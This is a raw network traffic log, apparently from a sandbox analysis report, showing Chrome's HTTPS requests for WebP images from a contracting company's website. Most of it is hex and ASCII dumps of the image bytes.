                                              2024-09-27 06:20:22 UTC8000INData Raw: 7a bb 9b eb 04 9a 7b 76 3c 8d 1f 65 c9 bf d7 29 43 45 c4 f1 ea d4 3c bd 34 98 d2 3f 4a 17 1e 01 be 72 49 f2 b5 79 ed 91 de 78 07 7b 2f 1e 79 d0 e6 d4 41 c2 db a1 90 7f 05 0a e0 fc 43 11 11 06 63 14 da b5 6c 64 e0 78 64 26 61 c0 37 0f b9 45 ef eb 4f 6c 65 ba 74 21 e6 90 7c c8 62 b8 dc f1 a6 e5 ac 46 83 44 0d 65 10 cc 42 9b 2a 36 14 73 1e 6b d0 38 74 28 92 ac 83 a1 5a 44 c5 79 5e 3c a7 c3 18 a2 05 78 d6 5d 39 79 79 94 89 76 bf 2f b1 df 79 68 82 c2 ef 09 6e 1b d2 c0 e0 af b5 33 09 e0 61 11 ce 20 0d d7 52 01 6a ff 36 d1 f8 1b ce 92 49 c0 a0 e6 82 e8 9a 85 31 da 8e e0 8b 01 e6 9b e5 b9 4e 2f 61 a6 82 9b 83 d1 d6 44 df ab f5 3b bd e2 61 fa 07 ab e1 01 60 02 ba a8 a7 a3 73 44 d4 16 bd c2 98 22 54 9c b0 54 87 60 45 df 00 31 af a3 3e d8 0c 0c 10 99 95 43 12 34 bc
                                              Data Ascii: z{v<e)CE<4?JrIyx{/yACcldxd&a7EOlet!|bFDeB*6sk8t(ZDy^<x]9yyv/yhn3a Rj6I1N/aD;a`sD"TT`E1>C4
                                              2024-09-27 06:20:22 UTC8000INData Raw: 97 12 a6 6e 40 8e 7d 18 bb de 69 1b 52 0c 33 3b c6 c6 00 38 97 de 1d 1f 05 37 f9 17 4d 26 9e 06 05 18 64 9e 85 27 57 1c 14 02 e9 85 d1 89 2d 23 5c 64 70 01 a0 6e 17 3f 98 02 63 a1 9b 74 43 84 3b 02 a8 2d 56 15 4a 8e d4 2b f3 d0 ed f3 1b d0 29 fe d5 04 ad 33 80 82 fe 62 77 97 28 05 83 e6 ae d9 9f d1 3c 27 40 00 05 20 22 f3 75 ae 24 47 fe 1c ac a6 c3 c1 dd 90 c6 06 59 38 5a a7 8e ae d5 0a 1b 75 92 1a b6 d7 a0 86 58 d5 5d 7a 3d 73 ea 7f a5 6a d7 ba 76 cc da 14 12 91 b5 d3 4b 5c 21 7e b8 71 0f 26 6f 0d 51 35 db 10 41 95 a9 a4 13 35 31 40 23 de a7 56 a3 1c 81 3b 59 64 aa 1e ec c7 e8 eb 4b 90 46 e1 43 63 88 54 2c 1e 59 5f 22 03 ed d2 e7 63 1a 1b f4 f6 1d 2d 65 5a b6 0d 78 b7 7c 30 53 05 df 77 8a 44 1b 92 25 97 40 bf 26 5a 88 b3 ef 37 41 c9 00 9b 2b e7 1c 20 c4
                                              Data Ascii: n@}iR3;87M&d'W-#\dpn?ctC;-VJ+)3bw(<'@ "u$GY8ZuX]z=sjvK\!~q&oQ5A51@#V;YdKFCcT,Y_"c-eZx|0SwD%@&Z7A+
                                              2024-09-27 06:20:22 UTC8000INData Raw: 7d 65 53 d6 0f 3c e7 4a 3f 77 95 1a 9c 5a 15 b7 89 98 60 e8 f9 00 5e 77 6d 2c 19 28 ee a3 34 e2 4a 2c 19 52 80 cc 13 ee ad 94 da ca e2 e6 27 2f e8 93 68 79 61 57 50 5c bb 4d 3e 49 44 f5 08 b0 a0 66 be a3 bd 35 7c 51 65 e9 7c f5 82 78 9f db b9 4f c4 87 09 9c 96 a4 fe 09 19 b2 26 7d 08 f5 25 e8 0a d7 93 5a c7 d7 43 c3 9b ab 3a 9f b1 21 30 00 91 e0 fe 78 d5 79 3a 1a 02 ce 2e a1 fe 82 be 5e 18 c5 f7 09 fe 9f 92 2d a5 b5 a0 42 66 f8 8c de 59 4b 84 24 0c 3e e2 e1 d6 78 eb 2b cb 4f 38 fa 99 3d e6 35 29 b2 68 d5 be b9 4c bd 61 dc 98 c4 aa aa 90 be ae c6 d8 ca e7 eb 7d 87 34 f9 96 21 ca 4d 0f 58 73 9f 60 5e e9 bd 47 0f c2 64 a6 5c 68 49 4c c1 27 ea 01 de 3d 27 b5 1d 72 44 ff 30 c2 0a 8b e1 16 9e 6d 5e 81 7b 8f 1e 3e 9f 18 6f 78 77 4d f8 d1 6d ee 96 1c b8 1d 73 0e
                                              Data Ascii: }eS<J?wZ`^wm,(4J,R'/hyaWP\M>IDf5|Qe|xO&}%ZC:!0xy:.^-BfYK$>x+O8=5)hLa}4!MXs`^Gd\hIL'='rD0m^{>oxwMms
                                              2024-09-27 06:20:22 UTC8000INData Raw: 3c 8a fd 18 47 7b 85 2c ec 7d 9b 20 6b 72 d2 25 27 d0 51 72 e7 7a 71 bb 94 8c 72 df 2b 55 40 59 c1 5c ca 68 24 33 28 64 cc 2d 86 85 44 ec 5d 79 04 be f1 3b 05 8d 21 67 ef 2c ac b6 00 fd af de 88 41 9d c5 b0 65 02 95 8c 3d 8a 38 09 9e 84 60 0c 91 91 27 22 93 cc e9 a9 92 6d c1 3e d1 0f 02 dc e0 48 eb 3d 56 99 bb 75 e6 8d 01 4a b6 53 70 94 79 3b 73 c1 94 0e eb 13 f5 d1 43 db b2 0e 26 e4 3d fa 54 bf 5d 76 91 25 d1 5a 23 2c c7 07 7f f4 80 c1 3e 32 a0 99 6d 83 39 1c 36 a6 7e 07 4b 7f c9 93 98 6f ba bd 32 9e 66 9d 1f fb 8d 67 bb ce 2f 11 37 30 0e 7d c4 7a b2 83 9f ec 7a 8a de 14 55 4b 87 16 79 57 fe 52 af 28 c7 90 a9 34 ac 97 95 b4 d9 8e ed 88 4c 8a b9 b6 bd 7e 56 b3 cf 1d db 9b a7 b3 95 47 dc 02 a3 6c 0b db 9e 15 37 b8 25 b9 db 0a a2 ab 19 1c b4 04 ca a2 b7 a5
                                              Data Ascii: <G{,} kr%'Qrzqr+U@Y\h$3(d-D]y;!g,Ae=8`'"m>H=VuJSpy;sC&=T]v%Z#,>2m96~Ko2fg/70}zzUKyWR(4L~VGl7%
                                              2024-09-27 06:20:22 UTC251INData Raw: cd bd a2 1b fa 3f 41 05 06 e6 ae a7 39 d1 26 a1 53 b9 b1 72 1e 0b ff 71 de 4f 33 55 46 e0 9e 72 4d 19 03 cc 0f b4 91 7b 00 00 62 b3 c2 17 5a 81 ec 40 08 00 32 19 d3 e0 02 40 d4 01 16 bb c2 66 9d 3c f0 de 7f 0f 0a 3f b8 59 0c 6a b2 9b d5 bc 9a 7c 58 77 35 20 1e bd 94 b8 b2 e8 1c d0 dc 32 1e b3 a9 20 50 07 d2 5b d6 c6 8e 5b 23 63 11 53 7b 86 de a0 a2 93 f8 86 07 a9 53 e9 b1 d1 95 24 b8 e7 4c 90 9a a7 72 92 5c 57 f1 0c 13 26 48 72 80 89 d3 83 d7 10 82 e7 2b 6b 8a c2 ee cf 52 2f 14 5f 80 00 00 50 53 41 49 4e 00 00 00 38 42 49 4d 03 ed 00 00 00 00 00 10 00 48 00 00 00 01 00 02 00 48 00 00 00 01 00 02 38 42 49 4d 04 28 00 00 00 00 00 0c 00 00 00 02 3f f0 00 00 00 00 00 00 38 42 49 4d 04 43 00 00 00 00 00 0e 50 62 65 57 01 10 00 06 00 2a 00 00 00 00
                                              Data Ascii: ?A9&SrqO3UFrM{bZ@2@f<?Yj|Xw5 2 P[[#cS{S$Lr\W&Hr+kR/_PSAIN8BIMHH8BIM(?8BIMCPbeW*


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              133192.168.2.465470173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:22 UTC465OUTGET /uploads/projects/33/278721d8625e4718b5b85a64722cc99d.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:22 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:22 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 12:03:04 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 41254
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:22 UTC7931INData Raw: 52 49 46 46 1e a1 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 aa a0 00 00 30 c6 03 9d 01 2a cf 04 a3 03 3e e9 72 b2 53 a9 26 af a8 23 74 69 79 f0 1d 09 67 6e dc a4 5d 1f 0f 72 fb d2 f3 9b b7 c7 df ee 0e f9 e3 78 ec 14 02 88 45 07 96 f2 39 e8 c6 67 02 3f fd b3 4f b1 9f aa 28 57 a3 7e 85 ff cf f6 7d 7c 73 b6 ed cc 34 ff e7 cf e7 ff cf 61 ff f8 7d 3f fd 30 79 6e e8 58 dd 45 f5 ab fe 21 ea 91 e7 c1 eb cd fe ff d7 7b 4e af e9 5e 4e be 95 d8 5f e9 7e f6 9b 78 e0 3f e9 bc 22 fe f9 fc 9f 3c bf e9 f8 6f fc 0f f4 de 70 7b b3 bb 37 98 8f bc d9 91 fe cf 9d 5f ce 74 0f ff a3 ca 47 ed be 8b 3e 93 bf fa fa 05 fd d3 ff 5f ab 67 fc ef dd 71 6d d9 b9 e7 01 fb ae 69 78 35 d9 93 77 49 58 61 e0 05 6b f7 2c a8 ad 7e e5 95 15 af dc b2 a2
                                              Data Ascii: RIFFWEBPVP8XVP8 0*>rS&#tiygn]rxE9g?O(W~}|s4a}?0ynXE!{N^N_~x?"<op{7_tG>_gqmix5wIXak,~
                                              2024-09-27 06:20:22 UTC8000INData Raw: 6a 43 f8 00 00 00 0d a3 32 41 8c a4 02 a7 75 a7 80 02 c0 7a c2 01 95 21 32 68 00 00 00 19 f4 00 ed c0 00 00 00 04 b1 c4 21 36 e0 00 00 11 51 50 04 00 30 7b 6c 36 f1 80 00 00 00 00 28 ea c4 d7 24 00 02 62 a0 c6 e9 28 8d 82 12 75 41 49 dc 76 48 3f b4 d3 5d 00 42 e9 da 88 29 d6 2a 00 0e 65 9d 32 50 64 25 ed 45 35 2d 4b 6b 32 9d 94 a0 79 06 bb 41 fd 00 2f 70 00 00 00 44 60 6f d4 5a 82 1f e4 34 00 00 00 23 e0 0f e5 aa 47 c4 e9 49 b1 cb 07 0a cf 80 00 9e 1e 2a 72 10 0e 2c 07 06 25 ff 74 1a 35 0f e9 d9 3b 01 b3 49 41 20 02 a8 82 94 a1 47 00 d3 fe cd c1 10 00 00 00 00 a8 b0 00 3c b9 7e 81 06 96 89 53 7a de e2 b4 6b 8d 98 a7 f5 5e 96 67 eb fd 2c 81 fd c6 83 bf 57 6c 24 ce 63 1d c2 c7 b6 93 ba 00 01 7b 48 1e 48 00 bd c0 00 01 10 c8 4c 6e aa b7 20 00 00 03 35 e1 48
                                              Data Ascii: jC2Auz!2h!6QP0{l6($b(uAIvH?]B)*e2Pd%E5-Kk2yA/pD`oZ4#GI*r,%t5;IA G<~Szk^g,Wl$c{HHLn 5H
                                              2024-09-27 06:20:22 UTC8000INData Raw: d1 dd 2f 81 69 6a 8b 0c dc 62 aa a5 57 bf 3e c9 90 bd 01 df 97 e0 76 23 3a 13 80 81 e4 34 b6 80 69 7f 48 d1 fe 03 60 1c 7f 59 6f b0 a6 6e ff 3b 35 bd c2 16 eb 72 94 af 2a 2d 85 1b 6d a9 71 6a 72 34 04 5f 6e 14 ba fb 19 ca 79 ab d1 f1 2f 4e f1 5c fb 93 c5 3d ea 9d a0 2f 8c 3e ef ff 67 61 ad 41 88 78 75 b1 66 5c e6 89 1d db a8 73 aa 28 ef f0 b7 0a ba 51 69 68 02 e6 2b 77 cb f0 8a d0 be 83 53 ba b2 e3 70 75 ad 21 7a 0d 7f 35 2d 9a d8 02 18 0e e9 38 3f 40 8c 80 2c de a4 a7 04 a1 9d 30 ec f5 31 3c ac ce 84 4a e8 e1 4e d8 a3 d6 b0 5f 98 e0 ee 2f 8c 1e 0b c9 76 ee b3 d2 84 2f 92 c3 f1 df ab d0 60 4d 1a 99 3e 29 cf ef 3d d3 cc 13 73 de dc 05 96 48 b3 68 44 92 16 a9 b6 0e 2f c3 cb cc 85 24 7b fa 9c 6f eb 17 3c cb cc af c6 b9 c1 b4 85 64 ce 6a cb 62 da ea 73 62 54
                                              Data Ascii: /ijbW>v#:4iH`Yon;5r*-mqjr4_ny/N\=/>gaAxuf\s(Qih+wSpu!z5-8?@,01<JN_/v/`M>)=sHhD/${o<djbsbT
                                              2024-09-27 06:20:22 UTC8000INData Raw: 86 99 5d e7 f5 6c 5c 6c 08 71 f1 48 e8 30 0a 19 7d 31 b7 db 48 5f dd 2c 62 01 88 8e 97 89 61 89 10 12 9e 99 dc 96 2b 32 06 8c 55 35 0c 22 41 5f 4f 94 90 57 81 57 f7 de 9a 74 6f 28 54 5d e8 20 34 cb e2 a8 79 f5 de 93 fb a3 b0 fb dc 75 62 dd 9a 71 16 40 4b 1f 0a 43 61 ff f2 23 dd a8 fb 6a 7b 2a ea ac 3e bb 34 60 a8 08 f3 d1 68 a5 bc 84 ba 91 56 d1 16 b0 c6 e9 40 c8 aa 18 e0 85 97 ba df 40 26 f8 00 ef 7f 35 82 dd f7 f3 cf cf c1 45 80 84 a5 7a b4 b2 dc 6b d4 6f 14 00 22 cf bc 2f 24 6e 3b 7c 3e b0 46 0a a6 60 af fe e5 ed 04 bd f0 7b 48 3a 0b e4 e8 7a 5e b1 3d 53 74 5c 1f 38 6a e5 34 a1 52 86 5e a1 0f c3 e1 bd 7d b6 18 97 d2 9d b6 1d b7 ab c3 91 1a 8d ed 4d 35 3d e4 60 6a 14 d7 74 4d bc 8b 02 76 ca 99 cc 17 b3 01 b8 03 75 8a 37 28 bf dc bd 13 7c c0 90 dc 70 4b
                                              Data Ascii: ]l\lqH0}1H_,ba+2U5"A_OWWto(T] 4yubq@KCa#j{*>4`hV@@&5Ezko"/$n;|>F`{H:z^=St\8j4R^}M5=`jtMvu7(|pK
                                              2024-09-27 06:20:22 UTC8000INData Raw: 15 48 af 98 ae 22 dc d3 32 52 51 3f 2f bb 3e b0 4c 5a 6f d1 9e d1 ac 2c c8 cc b4 94 bb 45 23 7b 5c 3c 11 ac 5e d1 b4 15 99 8b 32 55 0b 1b bf 79 b5 16 6f 46 5c a8 bf 03 ed f3 73 91 c7 a0 88 94 25 9e ce 6f 43 35 c1 83 fd 8e f3 7b fe a3 18 aa 1f 67 71 54 31 75 f5 ca ab 2d 49 6b 21 0c 24 b3 03 11 0e e7 7e a1 b2 a3 bb 0d 0e 7e 5f ff 08 87 9f c8 f1 19 18 cc 63 75 44 2c 21 cd b8 5c 27 1f 9b 7c 32 e8 9f da ba 84 d5 3c 3f 5b 73 e6 1f 3d c7 bc a4 77 80 37 11 ce 39 3d 73 75 24 b4 9c b2 af 83 1c 3d df a3 a2 48 9b 8e 1f 16 a1 f7 ea d5 67 4d 83 e6 65 d9 ba f1 21 f4 e2 9f ce 32 8a 40 9b 48 f4 0e a3 c1 61 34 20 2a fd b6 a6 04 f9 bb 4f 1e b3 b1 3d 51 97 bb bf 81 61 2a 52 d9 0a 61 32 b0 50 58 a0 ea a5 3f e5 60 d4 47 f8 cd 4e 8c f2 1e bd fc 83 b5 b5 ea 68 6e 4d 6c aa 2d 1e
                                              Data Ascii: H"2RQ?/>LZo,E#{\<^2UyoF\s%oC5{gqT1u-Ik!$~~_cuD,!\'|2<?[s=w79=su$=HgMe!2@Ha4 *O=Qa*Ra2PX?`GNhnMl-
                                              2024-09-27 06:20:22 UTC1323INData Raw: 96 3d 9b 92 99 2c 73 7c f4 0f 0a 3f 53 0b 3b 6e 14 e0 1f 8b b4 bc 3a 5f ec 63 f2 3b 41 2c 42 55 cf e0 bb 2b 5d ac 7b bd a8 44 bf 78 c8 b1 50 7e 7a 3b 5e 49 4a 2b 24 b6 b3 e9 b7 2e b1 58 78 13 84 e9 27 60 5a 9f b6 19 dc 44 22 ae ec d2 31 d0 e0 8b 78 25 3d 6b d0 4c bd 1e e7 2e 18 ef 0e 7c 6f 2c 3f 0e 01 46 b9 77 f0 93 19 be 14 6b 46 de 73 61 d4 7a a4 98 62 9b bc 06 cd 3e 10 a2 1e 71 5f de 8e e2 9f 3d 0b 0d d4 29 b6 76 3e ba 10 c4 f2 1c cf 12 25 b1 52 4f 30 7c 5d de 2e 2b 03 f6 ee 4f 82 c3 42 4c 10 46 0f 15 61 ee 90 5f 50 e1 3f b6 ba 8c 6b 48 67 55 a1 14 8c 65 41 bb 06 30 a4 14 bb f8 b0 3e 2f cc f1 62 bf 26 e3 84 ad 0a bc 7d 4d 53 eb a2 6d ef 6c 70 4e 28 75 d5 f5 9a f2 a4 1c 55 42 3a 43 cf d6 ae ce 6f bc 15 6c fa f3 51 9f 70 11 cb 02 3d 57 f5 c8 3f 7e b8 46
                                              Data Ascii: =,s|?S;n:_c;A,BU+]{DxP~z;^IJ+$.Xx'`ZD"1x%=kL.|o,?FwkFsazb>q_=)v>%RO0|].+OBLFa_P?kHgUeA0>/b&}MSmlpN(uUB:ColQp=W?~F


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              134192.168.2.465469173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:22 UTC465OUTGET /uploads/projects/27/90299ab973339b4f1441f267ea92a6d7.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:22 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:22 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:57:05 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 86384
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:22 UTC7931INData Raw: 52 49 46 46 68 51 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 f4 50 01 00 50 d8 05 9d 01 2a cf 04 a3 03 3e e9 6c ad 52 29 25 bf b3 25 98 fa eb f0 1d 09 65 41 af d8 92 53 fb ae 6a bb 57 90 6e f7 70 91 ea fc b3 ff 97 fb 27 e9 7a 6a 5e 6d 9e 7f ce c6 09 dc 79 de 24 3e aa 0d 7f df af fd 1e 20 cf 30 6f e8 6e 10 f3 df b3 85 be 3a 76 f5 9a 27 e5 df 9c 3f b1 fb df 60 0c bc fa fb 3b ff 85 ef f3 ea 67 fd 27 a3 7f a3 5f 54 3f da 3d 12 7e e9 fa c1 7a 88 fe f9 e8 e9 e9 69 eb 85 fd 8f d4 03 ce ef d7 1b fc fe 45 b7 ca bf f1 79 ea fa 07 f8 5e 02 fe 6b f6 ff f2 ff c6 fb 50 7e c7 9f 3f 81 ff 1b cd 5f b6 6e 99 f6 dd fd ff fe 5f f6 9f 90 fe b2 fe ef fc bf fe 6f f4 de c1 1f af 79 32 fe 97 72 36 ef ff 2b f7 0b d8 3b dd 4f bd fe d0 fa 9a
                                              Data Ascii: RIFFhQWEBPVP8XVP8 PP*>lR)%%eASjWnp'zj^my$> 0on:v'?`;g'_T?=~ziEy^kP~?_n_oy2r6+;O
                                              2024-09-27 06:20:22 UTC8000INData Raw: c4 0e eb 75 0d e8 93 75 37 32 c4 ea 0f 63 1d b2 ac 4a d7 9f 41 20 5f b8 67 ed f0 95 8d d4 b3 3b bc 00 91 08 e5 e0 69 d7 c3 08 27 48 e3 44 1c 29 73 22 bf 85 5f f4 bf b4 ea fe ac dd 1d 59 55 c9 5d ef 7b cf 21 56 9a 08 28 eb 1c 7e cb 69 c9 52 26 d2 01 95 db 26 2c f8 70 84 13 2a 42 a8 b5 e1 74 81 be b8 3a 1e d4 86 49 e1 ed 53 a4 28 39 39 cd d9 75 6b ff 8c 0d 5e db 58 f4 8a b2 ae 62 fc 9c 69 83 7a 65 e6 49 b2 48 ed de 64 61 c7 27 ab e6 6c 84 d2 92 d1 d8 17 c3 dd ed 58 b9 54 35 b8 0c 07 7b 9c 20 ae bd ba ee cc 0f da 11 78 3f 63 e1 03 05 b2 cb e1 88 4c 89 04 88 1a 61 d0 5b 20 89 62 fa d2 6a 6c 6b e5 a1 07 a6 56 3a 09 41 c0 5b 5b 61 6e 6b be 95 fa 60 d8 97 68 c6 5e 70 60 e7 89 f9 56 b7 74 4e 71 6a 5b 12 19 de 42 b9 51 80 0f 2e e7 83 8a c3 c8 04 e7 82 b0 cc 97 32
                                              Data Ascii: uu72cJA _g;i'HD)s"_YU]{!V(~iR&&,p*Bt:IS(99uk^XbizeIHda'lXT5{ x?cLa[ bjlkV:A[[ank`h^p`VtNqj[BQ.2
                                              2024-09-27 06:20:22 UTC8000INData Raw: dd 4c 17 0b c8 9e 71 0a 6c e3 00 77 5e 0c 58 03 d1 83 42 0e 41 b2 fa aa 80 00 7d 81 8e fd e3 27 e6 e6 2a 69 74 70 7e 93 d2 d6 4e 0f cc 70 fc 9a c4 9e 6c c0 1a e0 2d 0e 00 00 00 cf a0 00 04 28 1e e0 32 b6 a9 e5 3b f4 2e cd 54 c2 5c 2d 20 d4 e2 7f a9 b1 07 23 9b b0 48 1f ab e4 77 24 9f 18 44 a5 24 87 0a de 32 72 98 6d 56 70 23 76 07 b9 5d c7 ac 9c 1e 22 5d 8e 52 ea 57 32 29 8c 7f 41 49 a4 01 2b 15 a9 2a 73 3d c9 9c aa e5 3c 00 37 2d 6e 55 06 4b 8d f6 7c 05 91 f5 47 91 2e de 4d 3d ca 4b 8c 4b af 20 ca 9d ac 38 d1 59 2a 84 e9 e9 67 48 c7 a4 32 37 f6 c0 06 6d e2 4b f0 c2 00 7b 87 48 03 54 68 63 ab 53 1e a0 21 a6 7e 4a 3d a4 b0 00 00 4e a2 fd 14 a2 54 5a 7e ed 1b a9 79 02 d5 3f cb 98 e3 3a 73 26 c7 84 ef da 35 54 ae 70 e3 76 9f 3c e5 c3 f2 0c 05 c0 37 f8 80 97
                                              Data Ascii: Lqlw^XBA}'*itp~Npl-(2;.T\- #Hw$D$2rmVp#v]"]RW2)AI+*s=<7-nUK|G.M=KK 8Y*gH27mK{HThcS!~J=NTZ~y?:s&5Tpv<7
                                              2024-09-27 06:20:22 UTC8000INData Raw: 25 27 fa 80 9d cc 30 eb e2 30 d1 08 33 3b 48 9f c0 45 0b 67 10 9d 74 0f b2 d8 56 e5 fe 1d ee ec d3 de 35 9b 88 f8 6f 24 93 db b6 0a 95 61 85 40 42 aa 4b f1 10 7e 02 90 c4 9c 79 c4 61 88 89 68 71 76 05 d4 aa 14 bc d4 cf df 8b 59 78 f1 78 bc 73 2c 42 88 95 13 5b 23 03 c4 1b 05 95 84 82 11 15 9e f6 1a 19 43 87 40 77 37 fc 8b ae 8f c8 1a 5c c3 52 dc 69 be e1 c3 a8 92 e3 52 dc de b2 20 00 ee 75 84 48 91 23 21 f5 58 79 ae 80 c8 80 f4 c3 b1 dc 04 53 90 f1 f1 86 0a f0 74 f7 28 50 25 8e fd db 39 fc 54 30 24 b8 52 82 be 89 51 6e 9a 3d f5 22 e8 c4 00 48 21 db 01 2b 24 e5 5a f0 e8 87 85 12 7e 5c e8 ab 1c 50 7f 2c 03 88 aa 36 fd f7 48 47 b7 9b 9b cb 43 07 c4 9d f4 8f 0a 12 a5 61 3e 2d 38 0c 5c bb ac e1 f4 d5 91 cf 56 17 b8 85 9c 9f 8d 82 11 7d aa 59 e8 1a 6a 73 1e 06
                                              Data Ascii: %'003;HEgtV5o$a@BK~yahqvYxxs,B[#C@w7\RiR uH#!XySt(P%9T0$RQn="H!+$Z~\P,6HGCa>-8\V}Yjs
                                              2024-09-27 06:20:22 UTC8000INData Raw: ee bd b0 ea 4d 2f 6c 0a 24 cd 81 0e 40 8b d4 24 16 3a 55 41 e6 bd ea e7 c9 5d 53 1b a3 c6 5c 7b 5b 2e 2b e5 70 dd 8a 3f 83 58 80 92 60 0f bf c1 a9 00 6d e5 59 dd d4 ff 9e 32 d5 76 a9 72 7b 03 16 65 3d 71 83 a7 30 61 e6 c1 0f 80 ad e9 36 21 c1 7a 44 cd 4d 2f 15 d1 ec cc 75 33 de 58 33 4e 5b ee 0d a9 ea df 29 4e 42 00 02 b2 d2 0b 9e 46 44 44 cb bd 17 76 0f c2 8d 6e 88 0e 3c e0 ad bc 5b ec 21 e3 e8 35 a2 66 f2 d5 70 3b 71 1d 6c c2 be ce 0d 8e 8f 83 56 d3 56 9c cb d5 d9 4b bf 6e c1 64 a1 af 07 49 2c 94 54 5e b3 c8 49 23 fe fc 27 06 fe 42 74 e2 3a b9 94 43 c9 d0 60 be dd 82 ef b2 10 ed 8e 46 53 a2 7a 4a 45 4b 6d 15 f4 55 e1 a2 38 56 8c 12 06 b4 22 0c 18 b4 8f 19 6f b8 f1 e1 33 d3 e2 1c 4f c2 26 b3 e9 c1 ee 57 8b e4 0b 6c 0f e1 f6 56 af 79 0d 64 eb 29 f5 3c 99
                                              Data Ascii: M/l$@$:UA]S\{[.+p?X`mY2vr{e=q0a6!zDM/u3X3N[)NBFDDvn<[!5fp;qlVVKndI,T^I#'Bt:C`FSzJEKmU8V"o3O&WlVyd)<
                                              2024-09-27 06:20:22 UTC8000INData Raw: c9 4f 9d a0 4d 1b 1a a5 56 9a fa 0d 16 05 46 78 cb 98 ac 5b 9c c3 c1 25 65 35 f0 c4 83 16 e7 61 6d 66 d2 b9 5f f0 6f 16 03 0a 71 9e 67 7a cf 6d 80 d7 3f 76 9a 67 41 25 ab 10 c5 82 c4 d9 31 04 1e 85 ce fa 7c 7d 01 d0 e3 ec 5c f2 e3 84 6c d5 ce d6 06 57 25 99 68 60 97 f1 4d 02 42 b7 39 60 e5 53 95 ac de d0 50 74 23 07 ff de d9 bb b6 fb b2 99 19 31 bb f3 a2 a1 b2 c6 dd f4 ed eb 38 2b 7d d4 89 78 84 d9 f8 4a 4f 29 d4 d5 8b 62 ef ae a1 56 43 24 99 d2 9a e1 a8 a7 8a 7c 6e 26 20 b5 2a 0c 36 25 73 0c ab 6b 77 e0 23 43 a7 af 87 63 a0 9d 2e 1f 79 94 bf 1c 1a 6b a0 fe 4b ea 2f 55 e2 4c ec 6a 8f d4 3c 0e 40 98 1e 49 5c c3 13 9a 0b fb 17 2e 6b 00 bf 1e 4f 23 e1 6c 58 61 a2 64 cc 2a 70 c6 d9 2c 47 c7 45 4c 5e 0f 27 ce 65 a6 41 61 0e 2a 79 12 02 d4 ce 3c 2f bb fd 1f 7c
                                              Data Ascii: OMVFx[%e5amf_oqgzm?vgA%1|}\lW%h`MB9`SPt#18+}xJO)bVC$|n& *6%skw#Cc.ykK/ULj<@I\.kO#lXad*p,GEL^'eAa*y</|
                                              2024-09-27 06:20:22 UTC8000INData Raw: 48 fc a0 5c 87 95 b2 53 0b c4 21 3f f1 b7 eb cd b5 6c 32 ba f1 cf 1c e9 34 fe 5d c5 26 1c a9 76 2d 73 8e e0 7d a5 3e ee 7d 31 03 81 ee b3 1a d0 9f e9 35 89 8a 57 25 c8 8d 2a 26 0e a8 2e 05 8c dd fc a6 db 95 f8 25 bb 77 5b b4 4c 21 a3 a3 37 a8 42 ca ad be e4 90 e5 a0 42 d6 09 79 26 b1 df 13 e6 e7 d8 d1 d6 c0 57 9e 48 b8 bd 8c 8d fc c8 42 c5 07 fe 84 bd 8f eb e5 a0 9c 52 32 c7 78 4e 36 46 9a 59 b1 d4 8a b4 50 a3 b7 70 b2 b3 8e 27 8e 83 5e 40 c5 07 57 80 ca df c7 15 d8 58 cb b6 3e 4f 03 99 e5 53 e7 f4 5f aa 79 46 f6 ec 03 b6 bc 60 27 4d 33 f9 35 bc 1c 0a 69 1a 2e 40 3e b3 48 ba 43 1a c4 49 7d cf bc ed ab 0b 60 9d d2 08 08 45 c6 8a db d2 71 bd 09 26 fc b1 a4 a6 39 84 17 6a 61 4c 0b ae d1 50 12 23 6b 1e 6f 16 92 c1 f6 84 c5 cf ed ff de be 1a be 3c 8f 7f cc 85
                                              Data Ascii: H\S!?l24]&v-s}>}15W%*&.%w[L!7BBy&WHBR2xN6FYPp'^@WX>OS_yF`'M35i.@>HCI}`Eq&9jaLP#ko<
